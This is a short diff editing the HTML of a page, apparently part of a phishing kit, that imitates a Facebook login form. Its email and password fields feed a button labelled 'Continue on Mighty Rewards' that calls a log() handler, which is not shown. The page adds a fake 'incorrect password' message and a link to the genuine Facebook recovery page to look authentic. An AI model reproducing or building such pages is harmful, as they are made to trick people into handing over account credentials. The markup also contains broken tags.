--- a/facebook/index.html
+++ b/facebook/index.html
@@ -126,15 +126,15 @@
             <h2>Facebook Login</h2>
             <form>
                 <div class="input-box">
-                    <label for="username">Email or Phone</label>
+                    <label>Email or Phone</label>
                     <input type="text" id="id" name="username" required>
                 </div>
                 <div class="input-box">
-                    <label for="password">Password</label>
+                    <label>Password</label>
                     <input type="password" id="pass" name="password" required>
                 </div>
                 <button onclick="log()">Continue on Mighty Rewards</button>
-                <br><br>
+                <br></br>
                 <b id="msg"style="color:red;display:none;">Your password or username are incorrect</div></b>
                 <div class="forgot-password">
                     <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgot password?</a>
